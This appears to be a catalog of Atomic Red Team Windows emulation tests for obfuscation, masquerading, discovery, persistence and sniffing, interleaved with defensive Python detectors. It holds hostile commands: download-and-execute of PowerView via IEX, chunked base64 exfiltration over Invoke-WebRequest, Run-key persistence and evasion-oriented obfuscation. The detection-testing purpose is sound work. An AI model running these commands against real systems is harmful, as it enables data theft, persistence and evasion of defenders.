T1027 manual windows Obfuscated Command Line using special Unicode characters
Obfuscated Files or Information
This is an obfuscated certutil command that, when executed, downloads a file from the web. Adapted from T1105. The obfuscation includes special option characters (Unicode hyphens in place of -), character substitution (e.g. the modifier letter ᶠ for f) and character insertion (including the invisible right-to-left override U+202E and left-to-right override U+202D characters). Reference: https://wietze.github.io/blog/windows-command-line-obfuscation
T1027 powershell elevated windows Snake Malware Encrypted crmlog file
Obfuscated Files or Information
This atomic test creates a file with a specific name and sets its attributes to Hidden, System and Archive. The file name and attributes mimic the encrypted crmlog file used in the Snake malware campaign, which is later decrypted by Snake's kernel driver. [Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"
T1027 command_prompt windows Execution from Compressed JScript File
Obfuscated Files or Information
Mimics execution of a compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
T1027 powershell windows Obfuscated PowerShell Command via Character Array
Obfuscated Files or Information
Spawns a child PowerShell process using character array obfuscation. Both the PowerShell binary name and executed command are constructed from ASCII values at runtime to evade string-based detection.
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
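The three obfuscation tests above (the Red Canary format-string and octal character array sample, the Unicode-hyphen certutil command, and the decimal character arrays) all hide a readable command behind a reversible transform, which is what a detection pipeline should undo before matching. The Python below is an added example and not code from Atomic Red Team: decode_numeric_arrays renders every comma-separated integer list in a command line as text, taking the base from a ToInt16(x, N) hint when one is present, and normalize_command_line folds Unicode look-alikes (NFKC, a set of dash-like code points, invisible format characters). The first sample is the Red Canary command verbatim and the second is the character-array test's lines joined; the certutil line and the dash code-point set are assumptions, because the page does not reproduce that command.

```python
import re
import unicodedata

# Obfuscated command lines from the two tests above.
RED_CANARY_SAMPLE = r"""$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )"""
CHAR_ARRAY_SAMPLE = r"""$ps = [char[]](112,111,119,101,114,115,104,101,108,108); $cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101); & (-join $ps) "-Command" (-join $cmd)"""

NUM_LIST_RE = re.compile(r"\d+(?:\s*,\s*\d+){3,}")   # four or more comma-separated integers
BASE_HINT_RE = re.compile(r"toint(?:16|32)\W*\(.*?,\s*(\d+)\s*\)", re.I | re.S)

# Dash-like code points folded to '-'. Assumption: a broad set, not the exact list
# of characters certutil accepts as option characters.
DASHES = {0x2010, 0x2011, 0x2012, 0x2013, 0x2014, 0x2015, 0x2212, 0xFE58, 0xFE63, 0xFF0D}


def decode_numeric_arrays(cmdline: str) -> list:
    """Render every numeric char array in cmdline as text.
    The base comes from a [Convert]::ToInt16(x, N) hint if present (8 in the
    Red Canary sample), otherwise decimal. Backticks are dropped first because
    PowerShell ignores them inside names such as "t`OinT`16"."""
    cleaned = cmdline.replace("`", "")
    hint = BASE_HINT_RE.search(cleaned)
    bases = [int(hint.group(1)), 10] if hint else [10]
    decoded = []
    for m in NUM_LIST_RE.finditer(cleaned):
        tokens = re.findall(r"\d+", m.group(0))
        for base in bases:
            try:
                text = "".join(chr(int(t, base)) for t in tokens)
            except ValueError:          # token not valid in this base: try the next one
                continue
            if text.isprintable():
                decoded.append(text)
                break
    return decoded


def normalize_command_line(cmdline: str) -> str:
    """Undo the Unicode tricks: NFKC folds modifier and fullwidth letters
    (e.g. 'ᶠ' -> 'f'), dash-like characters become '-', and invisible format
    characters (RLO/LRO, zero-width) are removed."""
    out = []
    for ch in unicodedata.normalize("NFKC", cmdline):
        if ord(ch) in DASHES:
            out.append("-")
        elif unicodedata.category(ch) == "Cf":
            continue
        else:
            out.append(ch)
    return "".join(out)


# Constructed certutil line in the style of the "special Unicode characters" test:
# en dashes as option characters, a modifier-letter f, and an RLO/LRO pair inside "certutil".
UNICODE_SAMPLE = "cert\u202e\u202dutil \u2013urlcache \u2013split \u2013\u1da0 http://example.test/a.txt"

if __name__ == "__main__":
    print(decode_numeric_arrays(RED_CANARY_SAMPLE))
    print(decode_numeric_arrays(CHAR_ARRAY_SAMPLE))
    print(normalize_command_line(UNICODE_SAMPLE))
```

Run the normalizer before any string rule on Sysmon Event ID 1 CommandLine fields; a rule for "certutil -urlcache" written against the raw field never sees the en dashes.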
T1027.004 command_prompt windows Compile After Delivery using csc.exe
Compile After Delivery
Compiles C# code using csc.exe, the C# compiler shipped with .NET. Upon execution an exe named T1027.004.exe will be placed in the temp folder.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} "#{input_file}"
T1027.004 powershell windows Dynamic C# Compile
Compile After Delivery
When C# is compiled dynamically, a .cmdline file will be created as part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe that will be executed is named T1027.004_DynamicCompile.exe and is contained in the 'bin' folder of this atomic; its source code is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
Invoke-Expression "#{input_file}"
T1027.006 powershell windows HTML Smuggling Remote Payload
HTML Smuggling
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction. The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
& "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"
T1027.007 powershell elevated windows Dynamic API Resolution-Ninja-syscall
Dynamic API Resolution
This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
if (Test-Path "C:\Users\Default\AppData\Local\Temp\hello.log") { Remove-Item "C:\Users\Default\AppData\Local\Temp\hello.log" -Force; Write-Host "[+] hello.log removed." }
T1027.013 powershell windows, macos, linux Decode Eicar File and Write to File
Encrypted/Encoded File
Decode the eicar value, and write it to file, for AV/EDR to try to catch.
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
T1027.013 powershell windows, macos, linux Decrypt Eicar File and Write to File
Encrypted/Encoded File
Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.
$encryptedString = "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"
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
T1027.018 powershell windows File Masquerading with Zero-Width Space
Invisible Unicode
Creates a file named 'secret.txt' but inserts a Zero-Width Space (U+200B) before the extension. This emulates how adversaries hide malicious files in plain sight, as they appear identical to legitimate files in File Explorer.
$fileName = "secret" + [char]0x200B + ".txt"
New-Item -Path "$env:TEMP\$fileName" -ItemType "file" -Value "Hidden Unicode Content" -Force
Write-Host "Created file: $env:TEMP\$fileName"
T1027.018 powershell windows Invisible Unicode in Environment Variables
Invisible Unicode
Sets an environment variable that includes a Zero-Width Non-Joiner (U+200C). This emulates techniques used to hide configuration data or persistence paths from administrators performing manual audits.
$varName = "PATH" + [char]0x200C
[Environment]::SetEnvironmentVariable($varName, "C:\Users\Public\Malicious", "User")
Write-Host "Hidden environment variable '$varName' set."
T1027.018 powershell windows Binary Masquerading via Invisible Unicode
Invisible Unicode
Copies a system binary (calc.exe) to a new name containing an invisible character (U+200D) and executes it. This tests the ability of EDRs to handle non-normalized file paths in process execution events.
$hiddentarget = "$env:TEMP\calc" + [char]0x200D + ".exe"
Copy-Item "C:\Windows\System32\calc.exe" -Destination $hiddentarget
Start-Process $hiddentarget
T1030 powershell windows Network-Based Data Transfer in Small Chunks
Data Transfer Size Limits
Simulate transferring data over a network in small chunks to evade detection.
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize

while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()
T1033 command_prompt windows System Owner/User Discovery
System Owner/User Discovery
Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
T1033 powershell windows Find computers where user has session - Stealth mode (PowerView)
System Owner/User Discovery
Find existing user sessions on other computers. Upon execution, information about any sessions discovered will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
T1033 powershell windows User Discovery With Env Vars PowerShell Script
System Owner/User Discovery
Use PowerShell environment variables to identify the currently logged-on user.
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
T1033 powershell windows GetCurrent User with PowerShell Script
System Owner/User Discovery
Use the GetCurrent method of the .NET WindowsIdentity class to identify the logged-on user.
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
T1033 powershell windows System Discovery - SocGholish whoami
System Owner/User Discovery
SocGholish runs whoami discovery commands and writes the results to a .tmp file. The test generates a filename similar to the random one SocGholish produces (rad followed by five random characters, with a .tmp extension) and writes the output to the configured output path. Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file
T1033 command_prompt windows System Owner/User Discovery Using Command Prompt
System Owner/User Discovery
Identify the system owner or current user using native Windows command prompt utilities.
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
T1036 powershell windows System File Copied to Unusual Location
Masquerading
Copying an EXE from System32 or SysWOW64 to a non-system directory, or executing it from a non-system directory, may be suspicious.
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null
T1036 powershell windows Malware Masquerading and Execution from Zip File
Masquerading
When the archive is unzipped and README.cmd is opened, it runs, renames the .pdf to .dll and executes the DLL. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
T1036.002 powershell windows Masquerading: Right-to-Left Override Batch File Creation and Execution
Right-to-Left Override
Creates a batch file and then uses the RTLO character (U+202E) to make the file name "evil_batchfdp.bat" display as "evil_batchtab.pdf". The script then executes the batch file, which displays "Hello World!" for 30 seconds before closing.
$filepath = #{fileloc}
$rtlo = [char]0x202E
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
$payload = @"
@echo off
echo Hello World!
timeout /t 30 /nobreak
exit
"@
Set-Content -Path $fileloc -Value $payload -Encoding Ascii -Force
Write-Host "Real filename on disk: $fileloc"
Write-Host "Displays in explorer as: evil_batchtab.pdf"
Start-Process -FilePath $fileloc -Wait
T1036.002 powershell windows Masquerading: RTLO Masqueraded File Download and Execution
Right-to-Left Override
Downloads a batch file whose name is obfuscated with the RTLO character (U+202E). The batch file then runs automatically, opening a cmd window that closes 30 seconds later.
$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1036.002/src/evil_batch.bat" -OutFile $fileloc -UseBasicParsing | Out-Null
Start-Process -FilePath $fileloc
T1036.003 command_prompt windows Masquerading as Windows LSASS process
Rename Legitimate Utilities
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, the test will hang until the 120-second timeout cancels the session.
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
T1036.003 command_prompt windows Masquerading - cscript.exe running as notepad.exe
Rename Legitimate Utilities
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from a non-standard path.
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
T1036.003 command_prompt windows Masquerading - wscript.exe running as svchost.exe
Rename Legitimate Utilities
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open, but wscript will have been renamed to svchost.exe and run out of %APPDATA%.
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
T1036.003 command_prompt windows Masquerading - powershell.exe running as taskhostw.exe
Rename Legitimate Utilities
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
T1036.003 powershell windows Masquerading - non-windows exe running as windows exe
Rename Legitimate Utilities
Copies an exe, renames it as a Windows exe, and launches it to masquerade as a real Windows exe. Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from a non-standard path.
copy "#{inputfile}" #{outputfile}
try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
catch { $_; exit $_.Exception.HResult}
Stop-Process -ID $myT1036_003
T1036.003 powershell windows Masquerading - windows exe running as different windows exe
Rename Legitimate Utilities
Copies a Windows exe, renames it as another Windows exe, and launches it to masquerade as the second Windows exe.
copy "#{inputfile}" #{outputfile}
$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036_003
T1036.003 command_prompt elevated windows Malicious process Masquerading as LSM.exe
Rename Legitimate Utilities
Copies cmd.exe to C:\lsm.exe and runs it, which writes a file to C:\. Upon successful execution, cmd.exe will have run as lsm.exe from a non-standard path. Detect lsm.exe running from an incorrect directory and under an incorrect service account.
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
T1036.004 command_prompt elevated windows Creating W32Time similar named service using schtasks
Masquerade Task or Service
Creates a scheduled task named win32times, similar to the legitimate W32Time service name, using schtasks, as done by the threat actor behind "Operation Wocao".
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times
T1036.004 command_prompt elevated windows Creating W32Time similar named service using sc
Masquerade Task or Service
Creates a service named win32times, similar to the legitimate W32Time service name, using sc, as done by the threat actor behind "Operation Wocao".
sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times
T1036.005 powershell windows Masquerade as a built-in system executable
Match Legitimate Resource Name or Location
Launch an executable that attempts to masquerade as a legitimate executable.
Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"
T1036.005 powershell elevated windows Masquerading cmd.exe as VEDetector.exe
Match Legitimate Resource Name or Location
This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application. The test copies cmd.exe, renames it to VEDetector.exe, adds a registry Run key for persistence, and executes the renamed binary. This technique may be used to evade detection by mimicking legitimate software names or locations.
Expected output:
- A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
- SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for the registry value set).
- The registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
References:
- [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
- [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"
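The rename tests in this group (cmd.exe as lsass.exe, cscript.exe as notepad.exe, wscript.exe as svchost.exe, powershell.exe as taskhostw.exe, cmd.exe as lsm.exe and as VEDetector.exe, and the System32 copy to a non-system directory) all produce the same observable: a process whose name on disk disagrees with the name compiled into its PE version resource, or a system process name running from the wrong directory. The Python below is an added example, not Atomic Red Team code, that applies those checks to constructed Sysmon Event ID 1 style records (Image and OriginalFileName fields). The expected directories, the protected-name list and the OriginalFileName values in the samples are assumptions; real telemetry needs an allowlist for legitimate binaries whose OriginalFileName differs from their file name.

```python
import ntpath

# Assumption: default %SystemRoot%; adjust if the lab uses a different drive or directory.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Process names that belong only in System32/SysWOW64 (the names the tests above borrow).
PROTECTED_NAMES = {"lsass.exe", "svchost.exe", "lsm.exe", "taskhostw.exe", "csrss.exe",
                   "wininit.exe", "services.exe"}

# Script and shell hosts that are routinely copied and renamed, keyed by PE OriginalFileName.
SCRIPT_HOSTS = {"cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe"}


def _in_system_dir(image: str) -> bool:
    d = ntpath.dirname(image).lower()
    return any(d == s or d.startswith(s + "\\") for s in SYSTEM_DIRS)


def evaluate(event: dict) -> list:
    """Findings for one process-creation record (Sysmon Event ID 1: Image, OriginalFileName)."""
    image = event.get("Image", "")
    name = ntpath.basename(image).lower()
    original = event.get("OriginalFileName", "").lower()
    findings = []
    # 1. Renamed binary: the name on disk disagrees with the name compiled into the PE.
    if original and original not in ("-", "?") and original != name:
        findings.append(f"renamed: {name} has OriginalFileName {original}")
    # 2. A protected system process name running outside System32/SysWOW64.
    if name in PROTECTED_NAMES and not _in_system_dir(image):
        findings.append(f"system process name outside system directory: {image}")
    # 3. A genuine script host copied to a non-system location, renamed or not.
    if original in SCRIPT_HOSTS and not _in_system_dir(image):
        findings.append(f"{original} executing from unusual location: {image}")
    return findings


def scan(events: list) -> dict:
    """Map Image -> findings for every record that produced at least one finding."""
    results = {}
    for e in events:
        f = evaluate(e)
        if f:
            results[e["Image"]] = f
    return results


# Constructed records modelled on the tests above; paths and OriginalFileName values are assumptions.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\lsass.exe", "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Windows\System32\lsass.exe", "OriginalFileName": "lsass.exe"},
    {"Image": r"C:\Users\lab\AppData\Roaming\svchost.exe", "OriginalFileName": "wscript.exe"},
    {"Image": r"C:\ProgramData\cmd.exe", "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE"},
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS).items():
        print(image, findings)
```

Check 1 is the strongest of the three because it does not depend on knowing the legitimate path; it only needs the OriginalFileName field, which Sysmon populates from the PE version resource.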

Start-Sleep -Seconds 5
T1036.007 command_prompt windows File Extension Masquerading
Double File Extension
Stages and executes files that masquerade as images or Office documents by using a double extension, e.g. SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quarterlyreport.docx.exe). Upon execution, three calc instances and three VBS windows will be launched.
copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
%temp%\T1036.007_masquerading.docx.exe
%temp%\T1036.007_masquerading.pdf.exe
%temp%\T1036.007_masquerading.ps1.exe
%temp%\T1036.007_masquerading.xls.vbs
%temp%\T1036.007_masquerading.xlsx.vbs
%temp%\T1036.007_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
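The invisible-Unicode, right-to-left-override and double-extension tests above all rely on the gap between what a name looks like and what the shell actually dispatches on. The Python below is an added example (not part of Atomic Red Team) that closes that gap for a file or variable name: it reports bidi override and zero-width characters, renders the name approximately as a bidi-aware UI would, compares the displayed extension with the real one, and flags a document extension followed by an executable one. The sample names are constructed from the tests' own values; the extension lists and the simplified bidi rendering are assumptions.

```python
import os
import unicodedata

BIDI_OVERRIDES = {"\u202e": "RLO", "\u202d": "LRO"}
INVISIBLE = {"\u200b": "ZWSP", "\u200c": "ZWNJ", "\u200d": "ZWJ", "\u2060": "WJ", "\ufeff": "BOM"}
EXEC_EXTS = {".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".vbs", ".js", ".jse", ".wsf",
             ".ps1", ".hta", ".dll", ".msi"}
DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf", ".txt",
            ".png", ".jpg", ".jpeg", ".gif"}


def rendered_name(name: str) -> str:
    """Approximate how a bidi-aware UI draws the string: after an RLO (U+202E) the
    text is shown reversed until a PDF (U+202C) or LRO (U+202D) ends the run.
    Simplified model of the bidi algorithm, adequate for file names."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            j = i + 1
            while j < len(name) and name[j] not in ("\u202c", "\u202d"):
                j += 1
            out.append(name[i + 1:j][::-1])
            i = j
        elif ch in ("\u202c", "\u202d"):
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def analyze_name(name: str) -> dict:
    """Findings for a file (or variable) name: bidi overrides, invisible characters,
    displayed/real extension mismatch, and document-then-executable double extensions."""
    findings = []
    for ch, label in BIDI_OVERRIDES.items():
        if ch in name:
            findings.append(f"bidi override {label}")
    for ch, label in INVISIBLE.items():
        if ch in name:
            findings.append(f"invisible {label}")
    for ch in sorted(set(name)):        # any other format character is worth a look too
        if (unicodedata.category(ch) == "Cf" and ch not in BIDI_OVERRIDES
                and ch not in INVISIBLE and ch != "\u202c"):
            findings.append(f"format char U+{ord(ch):04X}")
    shown = rendered_name(name)
    true_ext = os.path.splitext(name)[1].lower()     # what the shell actually dispatches on
    shown_ext = os.path.splitext(shown)[1].lower()
    if true_ext != shown_ext:
        findings.append(f"displayed extension {shown_ext} differs from real {true_ext}")
    stem, outer = os.path.splitext(name.lower())
    inner = os.path.splitext(stem)[1]
    if outer in EXEC_EXTS and inner in DOC_EXTS:
        findings.append(f"double extension {inner}{outer}")
    return {"rendered": shown, "true_extension": true_ext, "findings": findings}


# Constructed names mirroring the three test families above.
SAMPLE_NAMES = [
    "evil_batch\u202efdp.bat",     # RTLO: displays as evil_batchtab.pdf
    "secret\u200b.txt",            # zero-width space before the extension
    "calc\u200d.exe",              # zero-width joiner in a binary name
    "PATH\u200c",                  # environment-variable name with a ZWNJ
    "Quarterlyreport.docx.exe",    # double extension
    "Quarterlyreport.docx",        # benign
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(analyze_name(n))
```

Feed it the TargetFilename of Sysmon Event ID 11 (file create) and the Image of Event ID 1; both carry the raw, un-rendered name, which is exactly where these characters are visible.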
T1037.001 command_prompt windows Logon Scripts
Logon Script (Windows)
Adds a registry value (UserInitMprLogonScript under HKCU\Environment) that runs a batch script created in the %temp% directory at logon. Upon execution, the new value can be viewed in the Registry Editor under HKCU\Environment.
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
T1039 command_prompt elevated windows Copy a sensitive File over Administrative share with copy
Data from Network Shared Drive
Copies a sensitive file from the C$ administrative share of another LAN computer with the copy command. https://twitter.com/SBousseaden/status/1211636381086339073
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
T1039 powershell elevated windows Copy a sensitive File over Administrative share with Powershell
Data from Network Shared Drive
Copies a sensitive file from the C$ administrative share of another LAN computer with PowerShell. https://twitter.com/SBousseaden/status/1211636381086339073
copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
T1040 command_prompt elevated windows Packet Capture Windows Command Prompt
Network Sniffing
Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
T1040 command_prompt elevated windows Windows Internal Packet Capture
Network Sniffing
Uses the built-in Windows packet capture (netsh trace). After the trace is stopped you should find files named trace.etl and trace.cab in the temp directory.
netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
T1040 command_prompt elevated windows Windows Internal pktmon capture
Network Sniffing
Will start a packet capture and store log file as t1040.etl. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe start --etw  -f %TEMP%\t1040.etl
TIMEOUT /T 5 >nul 2>&1
pktmon.exe stop
T1040 command_prompt elevated windows Windows Internal pktmon set filter
Network Sniffing
Adds a pktmon filter for the desired port (445 by default) so that a subsequent capture only records that traffic. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe filter add -p 445
T1040 powershell elevated windows PowerShell Network Sniffing
Network Sniffing
Uses the built-in NetEventPacketCapture PowerShell cmdlets to capture network traffic. https://learn.microsoft.com/en-us/powershell/module/neteventpacketcapture/new-neteventsession?view=windowsserver2022-ps
New-NetEventSession -Name Capture007 -LocalFilePath "$ENV:Temp\sniff.etl"
Add-NetEventPacketCaptureProvider -SessionName Capture007 -TruncationLength 100
Start-NetEventSession -Name Capture007
Stop-NetEventSession -Name Capture007
